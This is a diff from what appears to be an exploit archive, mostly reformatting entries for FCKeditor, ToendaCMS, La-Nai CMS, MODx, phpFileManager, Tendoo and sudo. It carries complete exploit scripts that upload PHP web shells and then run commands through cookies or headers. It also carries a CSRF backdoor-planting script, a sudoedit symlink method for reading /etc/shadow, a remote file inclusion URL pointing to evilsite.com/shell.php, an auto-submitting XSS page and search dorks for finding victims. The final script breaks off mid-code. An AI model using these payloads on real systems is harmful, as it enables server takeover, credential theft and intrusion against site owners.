@ -1,15 +1,25 @@
 - Title: FCKEditor 2.6.8 ASP Version File Upload Protection bypass
 - Credit goes to: Mostafa Azizi, Soroush Dalili
- Link:http://sourceforge.net/projects/fckeditor/files/FCKeditor/
+- Link: http://sourceforge.net/projects/fckeditor/files/FCKeditor/
 - Description:
 There is no validation on the extensions when FCKEditor 2.6.8 ASP version is 
 dealing with the duplicate files. As a result, it is possible to bypass 
 the protection and upload a file with any extension.
 - Reference: http://soroush.secproject.com/blog/2012/11/file-in-the-hole/
 - Solution: Please check the provided reference or the vendor website.
 - PoC: http://www.youtube.com/v/1VpxlJ5jLO8?version=3&hl=en_US&rel=0&vq=hd720
 Duplicate files do not have proper validation on their extensions.
 As a result, it is possible to upload any file with any extension on the server by using Null Character.
 Applications on IIS6 can also use "file.asp;gif" pattern.
 - Solution: In "config.asp", wherever you have: ConfigAllowedExtensions.Add "File","EXTENSION HERE" Change it to: ConfigAllowedExtensions.Add "File","^(Extensions HERE)$"
 - Vulnerability: Vulnerable File: commands.asp Function: FileUpload() Vulnerable Code: sFileName = RemoveExtension( sOriginalFileName ) & "(" & iCounter & ")." & sExtension
 - PoC:http://www.youtube.com/v/1VpxlJ5jLO8?version=3&hl=en_US&rel=0&vq=hd720
 "
 Note: Quick patch for FCKEditor 2.6.8 File Upload Bypass:
--- a/platforms/linux/local/37710.txt
+++ b/platforms/linux/local/37710.txt
@ -0,0 +1,36 @@
 # Exploit Title: sudo -e - a.k.a. sudoedit -  unauthorized privilege escalation
 # Date: 07-23-2015
 # Exploit Author: Daniel Svartman
 # Version: Sudo <=1.8.14
 # Tested on: RHEL 5/6/7 and Ubuntu (all versions)
 # CVE: CVE-2015-5602.
 Hello,
 I found a security bug in sudo (checked in the latest versions of sudo
 running on RHEL and ubuntu) when a user is granted with root access to
 modify a particular file that could be located in a subset of directories.
 It seems that sudoedit does not check the full path if a wildcard is used
 twice (e.g. /home/*/*/file.txt), allowing a malicious user to replace the
 file.txt real file with a symbolic link to a different location (e.g.
 /etc/shadow).
 I was able to perform such redirect and retrieve the data from the
 /etc/shadow file.
 In order for you to replicate this, you should configure the following line
 in your /etc/sudoers file:
 <user_to_grant_priv> ALL=(root) NOPASSWD: sudoedit /home/*/*/test.txt
 Then, logged as that user, create a subdirectory within its home folder
 (e.g. /home/<user_to_grant_priv>/newdir) and later create a symbolic link
 inside the new folder named test.txt pointing to /etc/shadow.
 When you run sudoedit /home/<user_to_grant_priv>/newdir/test.txt you will
 be allowed to access the /etc/shadow even if have not been granted with
 such access in the sudoers file.
 I checked this against fixed directories and files (not using a wildcard)
 and it does work with symbolic links created under the /home folder.
--- a/platforms/php/webapps/2035.php
+++ b/platforms/php/webapps/2035.php
@ -1,139 +1,139 @@
-#!/usr/bin/php -q -d short_open_tag=on
+#!/usr/bin/php -q -d short_open_tag=on
-<?
+<?
-echo "ToendaCMS <= 1.0.0 Shizouka stable 'F(u)CKeditor' remote commands execution\n";
+echo "ToendaCMS <= 1.0.0 Shizouka stable 'F(u)CKeditor' remote commands execution\n";
-echo "by rgod rgod@autistici.org\n";
+echo "by rgod rgod@autistici.org\n";
-echo "site: http://retrogod.altervista.org\n";
+echo "site: http://retrogod.altervista.org\n";
-echo "dork: \"toendaCMS is Free Software released under the GNU/GPL License.\" | \"powered by toendaCMS\" -inurl:demo\n\n";
+echo "dork: \"toendaCMS is Free Software released under the GNU/GPL License.\" | \"powered by toendaCMS\" -inurl:demo\n\n";
-
+
-//works regardless of any php.ini settings,
+//works regardless of any php.ini settings,
-
+
-
+
-if ($argc<4) {
+if ($argc<4) {
-echo "Usage: php ".$argv[0]." host path cmd OPTIONS\n";
+echo "Usage: php ".$argv[0]." host path cmd OPTIONS\n";
-echo "host:      target server (ip/hostname)\n";
+echo "host:      target server (ip/hostname)\n";
-echo "path:      path to toendacms\n";
+echo "path:      path to toendacms\n";
-echo "cmd:       a shell command\n";
+echo "cmd:       a shell command\n";
-echo "Options:\n";
+echo "Options:\n";
-echo "   -p[port]:    specify a port other than 80\n";
+echo "   -p[port]:    specify a port other than 80\n";
-echo "   -P[ip:port]: specify a proxy\n";
+echo "   -P[ip:port]: specify a proxy\n";
-echo "Example:\n";
+echo "Example:\n";
-echo "php ".$argv[0]." localhost /cms/ ls -la\n";
+echo "php ".$argv[0]." localhost /cms/ ls -la\n";
-die;
+die;
-}
+}
-error_reporting(0);
+error_reporting(0);
-ini_set("max_execution_time",0);
+ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
+ini_set("default_socket_timeout",5);
-
+
-function quick_dump($string)
+function quick_dump($string)
-{
+{
-  $result='';$exa='';$cont=0;
+  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
+  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
+  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
+   {$result.="  .";}
-   else
+   else
-   {$result.="  ".$string[$i];}
+   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
+   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
+   {$exa.=" ".dechex(ord($string[$i]));}
-   else
+   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
+   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
+  }
- return $exa."\r\n".$result;
+ return $exa."\r\n".$result;
-}
+}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
+function sendpacketii($packet)
-{
+{
-  global $proxy, $host, $port, $html, $proxy_regex;
+  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
+  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
+    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
+    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
+      echo 'No response from '.$host.':'.$port; die;
-    }
+    }
-  }
+  }
-  else {
+  else {
-	$c = preg_match($proxy_regex,$proxy);
+	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
+    if (!$c) {
-      echo 'Not a valid proxy...';die;
+      echo 'Not a valid proxy...';die;
-    }
+    }
-    $parts=explode(':',$proxy);
+    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
+    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
+    if (!$ock) {
-      echo 'No response from proxy...';die;
+      echo 'No response from proxy...';die;
-	}
+	}
-  }
+  }
-  fputs($ock,$packet);
+  fputs($ock,$packet);
-  if ($proxy=='') {
+  if ($proxy=='') {
-    $html='';
+    $html='';
-    while (!feof($ock)) {
+    while (!feof($ock)) {
-      $html.=fgets($ock);
+      $html.=fgets($ock);
-    }
+    }
-  }
+  }
-  else {
+  else {
-    $html='';
+    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
+      $html.=fread($ock,1);
-    }
+    }
-  }
+  }
-  fclose($ock);
+  fclose($ock);
-  #debug
+  #debug
-  #echo "\r\n".$html;
+  #echo "\r\n".$html;
-}
+}
-
+
-$host=$argv[1];
+$host=$argv[1];
-$path=$argv[2];
+$path=$argv[2];
-$port=80;
+$port=80;
-$proxy="";
+$proxy="";
-$cmd="";
+$cmd="";
-for ($i=3; $i<=$argc-1; $i++){
+for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
+$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
+if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
+{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
+if ($temp=="-p")
-{
+{
-  $port=str_replace("-p","",$argv[$i]);
+  $port=str_replace("-p","",$argv[$i]);
-}
+}
-if ($temp=="-P")
+if ($temp=="-P")
-{
+{
-  $proxy=str_replace("-P","",$argv[$i]);
+  $proxy=str_replace("-P","",$argv[$i]);
-}
+}
-}
+}
-
+
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
+
-$shell="<?php echo chr(72).\"i Master!\";if(get_magic_quotes_gpc()){\$_COOKIE[\"cmd\"]=stripslashes(\$_COOKIE[\"cmd\"]);}";
+$shell="<?php echo chr(72).\"i Master!\";if(get_magic_quotes_gpc()){\$_COOKIE[\"cmd\"]=stripslashes(\$_COOKIE[\"cmd\"]);}";
-$shell.="ini_set(\"max_execution_time\",0);error_reporting(0);";
+$shell.="ini_set(\"max_execution_time\",0);error_reporting(0);";
-$shell.="echo \"*delim*\";passthru(\$_COOKIE[\"cmd\"]);?>";
+$shell.="echo \"*delim*\";passthru(\$_COOKIE[\"cmd\"]);?>";
-$allowed_extensions = array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla");
+$allowed_extensions = array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla");
-for ($i=0; $i<=count($allowed_extensions)-1; $i++){
+for ($i=0; $i<=count($allowed_extensions)-1; $i++){
-$filename="suntzu.php.".$allowed_extensions[$i];
+$filename="suntzu.php.".$allowed_extensions[$i];
-$data="-----------------------------7d529a1d23092a\r\n";
+$data="-----------------------------7d529a1d23092a\r\n";
-$data.="Content-Disposition: form-data; name=\"NewFile\"; filename=\"$filename\"\r\n";
+$data.="Content-Disposition: form-data; name=\"NewFile\"; filename=\"$filename\"\r\n";
-$data.="Content-Type:\r\n\r\n";
+$data.="Content-Type:\r\n\r\n";
-$data.="$shell\r\n";
+$data.="$shell\r\n";
-$data.="-----------------------------7d529a1d23092a--\r\n";
+$data.="-----------------------------7d529a1d23092a--\r\n";
-$packet="POST ".$p."engine/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
+$packet="POST ".$p."engine/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
-$packet.="Host: ".$host."\r\n";
+$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n\r\n";
+$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
+$packet.=$data;
-sendpacketii($packet);
+sendpacketii($packet);
-//echo $html;
+//echo $html;
-$packet="GET ".$p."data/images/File/".$filename." HTTP/1.0\r\n";
+$packet="GET ".$p."data/images/File/".$filename." HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
+$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: cmd=".$cmd."\r\n";
+$packet.="Cookie: cmd=".$cmd."\r\n";
-$packet.="Connection: Close\r\n\r\n";
+$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
+sendpacketii($packet);
-//echo $html;
+//echo $html;
-if (eregi("Hi Master!",$html)){
+if (eregi("Hi Master!",$html)){
-$temp=explode("*delim*",$html);
+$temp=explode("*delim*",$html);
-die($temp[1]);}
+die($temp[1]);}
-}
+}
-//if you are here...
+//if you are here...
-echo "Exploit failed...";
+echo "Exploit failed...";
-?>
+?>
-
+
-# milw0rm.com [2006-07-18]
+# milw0rm.com [2006-07-18]
--- a/platforms/php/webapps/2706.txt
+++ b/platforms/php/webapps/2706.txt
@ -1,26 +1,26 @@
-+-------------------------------------------------------------------------------------------
+-------------------------------------------------------------------------------------------
-+ MODx CMS 0.9.2.1 (base_path) Remote File Include Vulnerability
+ MODx CMS 0.9.2.1 (base_path) Remote File Include Vulnerability
-+-------------------------------------------------------------------------------------------
+-------------------------------------------------------------------------------------------
-+ Affected Software .: MODx CMS 0.9.2.1
+ Affected Software .: MODx CMS 0.9.2.1
-+ Vendor ............: http://modxcms.com/
+ Vendor ............: http://modxcms.com/
-+ Download ..........: http://modxcms.com/downloads.html
+ Download ..........: http://modxcms.com/downloads.html
-+ Description .......: "MODx is an open source PHP Application Framework that helps you take control of your online content."
+ Description .......: "MODx is an open source PHP Application Framework that helps you take control of your online content."
-+ Dork ..............: "powered by MODx"
+ Dork ..............: "powered by MODx"
-+ Class .............: Remote File Inclusion
+ Class .............: Remote File Inclusion
-+ Risk ..............: High (Remote File Execution)
+ Risk ..............: High (Remote File Execution)
-+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
-+-------------------------------------------------------------------------------------------
+-------------------------------------------------------------------------------------------
-+ Details:
+ Details:
-+ MODx CMS manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php does not initialize
+ MODx CMS manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php does not initialize
-+ the $base_path variable before using it to include files, assuming register_globals = on,
+ the $base_path variable before using it to include files, assuming register_globals = on,
-+ we can intialize the variable in a query string and include a remote file of our choice.
+ we can intialize the variable in a query string and include a remote file of our choice.
-+ 
+ 
-+ Vulnerable Code:
+ Vulnerable Code:
-+ manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php, line(s) 24:
+ manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php, line(s) 24:
-+ -> include $base_path."manager/media/browser/mcpuk/connectors/php/Commands/helpers/iconlookup.php";
+ -> include $base_path."manager/media/browser/mcpuk/connectors/php/Commands/helpers/iconlookup.php";
-+
+
-+ Proof Of Concept:
+ Proof Of Concept:
-+ http://[target]/[path]/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://evilsite.com/shell.php?
+ http://[target]/[path]/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://evilsite.com/shell.php?
-+-------------------------------------------------------------------------------------------
+-------------------------------------------------------------------------------------------
-
+
-# milw0rm.com [2006-11-03]
+# milw0rm.com [2006-11-03]
--- a/platforms/php/webapps/37457.html
+++ b/platforms/php/webapps/37457.html
@ -6,5 +6,5 @@ An attacker may leverage this issue to execute arbitrary script code in the brow
 FCKEditor 2.6.7 is vulnerable; prior versions may also be affected. 
-html> <body> <iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe> <form method="post" name="sender" action="http://www.example.com//fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"; target="hidden"> <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' /> </form> </body> <script>document.sender.submit(); </script> </html>
+<html> <body> <iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe> <form method="post" name="sender" action="http://www.example.com/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"; target="hidden"> <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' /> </form> </body> <script>document.sender.submit(); </script> </html>
--- a/platforms/php/webapps/37712.txt
+++ b/platforms/php/webapps/37712.txt
@ -0,0 +1,125 @@
 # Exploit Title: CSRF Remote Backdoor Shell
 # Google Dork: intitle: CSRF Remote Backdoor Shell
 # Date: 2015-07-29
 # Exploit Author:  John Page ( hyp3rlinx )
 # Website: hyp3rlinx.altervista.org
 # Vendor Homepage: phpfm.sourceforge.net
 # Software Link:  phpfm.sourceforge.net
 # Version: 0.9.8
 # Tested on: windows 7 SP1
 # Category: Webapps
 Vendor:
 ================================
 phpfm.sourceforge.net
 Product:
 ============================
 phpFileManager version 0.9.8
 Vulnerability Type:
 ==========================
 CSRF Remote Backdoor Shell
 CVE Reference:
 ==============
 N/A
 Advisory Information:
 ========================================
 CSRF Remote Backdoor Shell Vulnerability
 Vulnerability Details:
 =======================================================================
 PHP File Manager is vulnerable to creation of arbitrary files on server
 via CSRF which we can use to create remote backdoor shell access if victim
 clicks our malicious linx or visits our malicious webpages.
 To create backdoor shell we will need to execute two POST requests
 1- to create PHP backdoor shell 666.php
 2- inject code and save to the backdoor we just created
 e.g.
 https://localhost/phpFileManager-0.9.8/666.php?cmd=[ OS command ]
 Exploit code(s):
 ===============
 <script>
 var
 scripto="frame=3&action=2&dir_dest=2&chmod_arg=&cmd_arg=666.php&current_dir=&selected_dir_list=&selected_file_list="
 blasphemer(scripto)
 var
 maliciouso="action=7&save_file=1&current_dir=.&filename=666.php&file_data='<?php+echo+'backdoor
 shell by hyp3rlinx......';+exec($_GET['cmd']);+?>"
 blasphemer(maliciouso)
 function blasphemer(payload){
 var xhr=new XMLHttpRequest()
 xhr.open('POST',"https://localhost/phpFileManager-0.9.8/index.php", true)
 xhr.setRequestHeader("content-type", "application/x-www-form-urlencoded")
 xhr.send(payload)
 }
 </script>
 Disclosure Timeline:
 =========================================================
 Vendor Notification: July 28, 2015
 July 29, 2015 : Public Disclosure
 Severity Level:
 =========================================================
 High
 Description:
 ==========================================================
 Request Method(s):              [+] POST
 Vulnerable Product:             [+] phpFileManager 0.9.8
 Vulnerable Parameter(s):        [+] action, cmd_arg, file_data, chmod_arg,
 save_file
 Affected Area(s):               [+] Web Server
 ===========================================================
 [+] Disclaimer
 Permission is hereby granted for the redistribution of this advisory,
 provided that it is not altered except by reformatting it, and that due
 credit is given. Permission is explicitly given for insertion in
 vulnerability databases and similar, provided that due credit is given to
 the author.
 The author is not responsible for any misuse of the information contained
 herein and prohibits any malicious use of all security related information
 or exploits by the author or elsewhere.
 by hyp3rlinx
--- a/platforms/php/webapps/37715.txt
+++ b/platforms/php/webapps/37715.txt
@ -0,0 +1,27 @@
 # Exploit Title: Tendoo CMS Stored And Reflected Xss Vulnerability
 # Google Dork: N/A
 # Date: 28/7/2015
 # Exploit Author: Arash Khazaei
 # Vendor Homepage: http://tendoo.org/
 # Software Link: http://sourceforge.net/projects/tendoo-cms/
 # Version: 1.3
 # Tested on: Kali , Windows
 # CVE : N/A
 # Contact : 0xclay@gmail.com
 ######################
 Introduction :
 a Stored And a Reflected XSS Vulnerability In Profile Area In Tendoo CMS
 Make CMS Vulnerable And Can Be Used For Stealing Admin Cookies And ....... .
 ######################
 Stored Xss In http://localhost/tendoo/index.php/account/update In First
 Name and Last Name Inputs
 Excute Java Script Codes And If Admin Or Any Body Come In Attacker Profile
 When First Name And Last Name Loads
 JavaScripts Code Will Be Excuted
 POC :
 https://i.leetfil.es/e992ad2d.jpg
 Discovered By Arash Khazaei
--- a/platforms/php/webapps/5618.txt
+++ b/platforms/php/webapps/5618.txt
@ -1,155 +1,155 @@
-<?php
+<?php
-
+
-/*
+/*
-	--------------------------------------------------------------
+	--------------------------------------------------------------
-	La-Nai CMS <= 1.2.16 (fckeditor) Arbitrary File Upload Exploit
+	La-Nai CMS <= 1.2.16 (fckeditor) Arbitrary File Upload Exploit
-	--------------------------------------------------------------
+	--------------------------------------------------------------
-	
+	
-	author...: EgiX
+	author...: EgiX
-	mail.....: n0b0d13s[at]gmail[dot]com
+	mail.....: n0b0d13s[at]gmail[dot]com
-	
+	
-	link.....: http://sourceforge.net/projects/la-nai/
+	link.....: http://sourceforge.net/projects/la-nai/
-
+
-	[-] vulnerable code in /include/fckeditor/editor/filemanager/upload/php/upload.php
+	[-] vulnerable code in /include/fckeditor/editor/filemanager/upload/php/upload.php
-	
+	
-	41.	// Get the posted file.
+	41.	// Get the posted file.
-	42.	$oFile = $_FILES['NewFile'] ;
+	42.	$oFile = $_FILES['NewFile'] ;
-	43.	
+	43.	
-	44.	// Get the uploaded file name and extension.
+	44.	// Get the uploaded file name and extension.
-	45.	$sFileName = $oFile['name'] ;
+	45.	$sFileName = $oFile['name'] ;
-	46.	$sOriginalFileName = $sFileName ;
+	46.	$sOriginalFileName = $sFileName ;
-	47.	$sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
+	47.	$sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
-	48.	$sExtension = strtolower( $sExtension ) ;
+	48.	$sExtension = strtolower( $sExtension ) ;
-	49.	
+	49.	
-	50.	// The the file type (from the QueryString, by default 'File').
+	50.	// The the file type (from the QueryString, by default 'File').
-	51.	$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
+	51.	$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
-	52.	
+	52.	
-	53.	// Check if it is an allowed type.
+	53.	// Check if it is an allowed type.
-	54.	if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
+	54.	if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
-	55.	    SendResults( 1, '', '', 'Invalid type specified' ) ;
+	55.	    SendResults( 1, '', '', 'Invalid type specified' ) ;
-	56.	
+	56.	
-	57.	// Get the allowed and denied extensions arrays.
+	57.	// Get the allowed and denied extensions arrays.
-	58.	$arAllowed	= $Config['AllowedExtensions'][$sType] ;
+	58.	$arAllowed	= $Config['AllowedExtensions'][$sType] ;
-	59.	$arDenied	= $Config['DeniedExtensions'][$sType] ;
+	59.	$arDenied	= $Config['DeniedExtensions'][$sType] ;
-	60.	
+	60.	
-	61.	// Check if it is an allowed extension.
+	61.	// Check if it is an allowed extension.
-	62.	if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
+	62.	if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
-	63.		SendResults( '202' ) ;
+	63.		SendResults( '202' ) ;
-	64.	
+	64.	
-	65.	$sErrorNumber	= '0' ;
+	65.	$sErrorNumber	= '0' ;
-	66.	$sFileUrl		= '' ;
+	66.	$sFileUrl		= '' ;
-	67.	
+	67.	
-	68.	// Initializes the counter used to rename the file, if another one with the same name already exists.
+	68.	// Initializes the counter used to rename the file, if another one with the same name already exists.
-	69.	$iCounter = 0 ;
+	69.	$iCounter = 0 ;
-	70.	
+	70.	
-	71.	// The the target directory.
+	71.	// The the target directory.
-	72.	if ( isset( $Config['UserFilesAbsolutePath'] ) )
+	72.	if ( isset( $Config['UserFilesAbsolutePath'] ) )
-	73.		$sServerDir = $Config['UserFilesAbsolutePath'] ;
+	73.		$sServerDir = $Config['UserFilesAbsolutePath'] ;
-	74.	else 
+	74.	else 
-	75.		//$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
+	75.		//$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
-	76.		$sServerDir = $Config["UserFilesPath"] ;
+	76.		$sServerDir = $Config["UserFilesPath"] ;
-	77.	
+	77.	
-	78.	while ( true )
+	78.	while ( true )
-	79.	{
+	79.	{
-	80.		// Compose the file path.
+	80.		// Compose the file path.
-	81.		$sFilePath = $sServerDir . $sFileName ;
+	81.		$sFilePath = $sServerDir . $sFileName ;
-	82.	
+	82.	
-	83.		// If a file with that name already exists.
+	83.		// If a file with that name already exists.
-	84.		if ( is_file( $sFilePath ) )
+	84.		if ( is_file( $sFilePath ) )
-	85.		{
+	85.		{
-	86.			$iCounter++ ;
+	86.			$iCounter++ ;
-	87.			$sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
+	87.			$sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
-	88.			$sErrorNumber = '201' ;
+	88.			$sErrorNumber = '201' ;
-	89.		}
+	89.		}
-	90.		else
+	90.		else
-	91.		{
+	91.		{
-	92.			move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
+	92.			move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
-	93.	
+	93.	
-	94.			if ( is_file( $sFilePath ) )
+	94.			if ( is_file( $sFilePath ) )
-	95.			{
+	95.			{
-	96.				$oldumask = umask(0) ;
+	96.				$oldumask = umask(0) ;
-	97.				chmod( $sFilePath, 0777 ) ;
+	97.				chmod( $sFilePath, 0777 ) ;
-	98.				umask( $oldumask ) ;
+	98.				umask( $oldumask ) ;
-	99.			}
+	99.			}
-	100.			
+	100.			
-	101.			$sFileUrl = $Config["UserFilesPath"] . $sFileName ;
+	101.			$sFileUrl = $Config["UserFilesPath"] . $sFileName ;
-	102.	
+	102.	
-	103.			break ;
+	103.			break ;
-	104.		}
+	104.		}
-	
+	
-	with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code	
+	with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code	
-*/
+*/
-
+
-error_reporting(0);
+error_reporting(0);
-set_time_limit(0);
+set_time_limit(0);
-ini_set("default_socket_timeout", 5);
+ini_set("default_socket_timeout", 5);
-
+
-function http_send($host, $packet)
+function http_send($host, $packet)
-{
+{
-	$sock = fsockopen($host, 80);
+	$sock = fsockopen($host, 80);
-	while (!$sock)
+	while (!$sock)
-	{
+	{
-		print "\n[-] No response from {$host}:80 Trying again...";
+		print "\n[-] No response from {$host}:80 Trying again...";
-		$sock = fsockopen($host, 80);
+		$sock = fsockopen($host, 80);
-	}
+	}
-	fputs($sock, $packet);
+	fputs($sock, $packet);
-	while (!feof($sock)) $resp .= fread($sock, 1024);
+	while (!feof($sock)) $resp .= fread($sock, 1024);
-	fclose($sock);
+	fclose($sock);
-	return $resp;
+	return $resp;
-}
+}
-
+
-print "\n+------------------------------------------------------------+";
+print "\n+------------------------------------------------------------+";
-print "\n| La-Nai CMS <= 1.2.16 Arbitrary File Upload Exploit by EgiX |";
+print "\n| La-Nai CMS <= 1.2.16 Arbitrary File Upload Exploit by EgiX |";
-print "\n+------------------------------------------------------------+\n";
+print "\n+------------------------------------------------------------+\n";
-
+
-if ($argc < 2)
+if ($argc < 2)
-{
+{
-	print "\nUsage......: php $argv[0] host path";
+	print "\nUsage......: php $argv[0] host path";
-	print "\nExample....: php $argv[0] localhost /lanai-cms/\n";
+	print "\nExample....: php $argv[0] localhost /lanai-cms/\n";
-	die();
+	die();
-}
+}
-
+
-$host = $argv[1];
+$host = $argv[1];
-$path = $argv[2];
+$path = $argv[2];
-
+
-$data  = "--12345\r\n";
+$data  = "--12345\r\n";
-$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
+$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
-$data .= "Content-Type: application/octet-stream\r\n\r\n";
+$data .= "Content-Type: application/octet-stream\r\n\r\n";
-$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
+$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
-$data .= "--12345--\r\n";
+$data .= "--12345--\r\n";
-
+
-$packet  = "POST {$path}include/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
+$packet  = "POST {$path}include/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
+$packet .= "Host: {$host}\r\n";
-$packet .= "Content-Length: ".strlen($data)."\r\n";
+$packet .= "Content-Length: ".strlen($data)."\r\n";
-$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
-$packet .= "Connection: close\r\n\r\n";
+$packet .= "Connection: close\r\n\r\n";
-$packet .= $data;
+$packet .= $data;
-
+
-preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
+preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
-
+
-if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
+if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
-else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
+else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
-
+
-define(STDIN, fopen("php://stdin", "r"));
+define(STDIN, fopen("php://stdin", "r"));
-
+
-while(1)
+while(1)
-{
+{
-	print "\nlanai-shell# ";
+	print "\nlanai-shell# ";
-	$cmd = trim(fgets(STDIN));
+	$cmd = trim(fgets(STDIN));
-	if ($cmd != "exit")
+	if ($cmd != "exit")
-	{
+	{
-		$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
+		$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
-		$packet.= "Host: {$host}\r\n";
+		$packet.= "Host: {$host}\r\n";
-		$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
